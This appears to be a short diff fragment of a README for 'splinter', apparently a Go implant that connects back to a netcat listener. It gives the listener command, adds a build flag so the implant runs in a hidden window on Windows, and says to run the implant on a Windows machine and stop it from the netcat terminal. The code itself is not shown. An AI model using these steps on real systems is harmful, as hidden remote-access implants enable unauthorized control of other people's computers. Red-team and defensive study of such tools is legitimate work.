fistfulofhummus/splinter/README.md

     go build
     nc -nlvp port

+Use go build -ldflags -H=windowsgui if you want the implant to run in a hidden window.
 Now just execute the implant on a Windows machine.
 If you want to terminate execution cleanly, type stop into your netcat terminal.

 ## TO-DO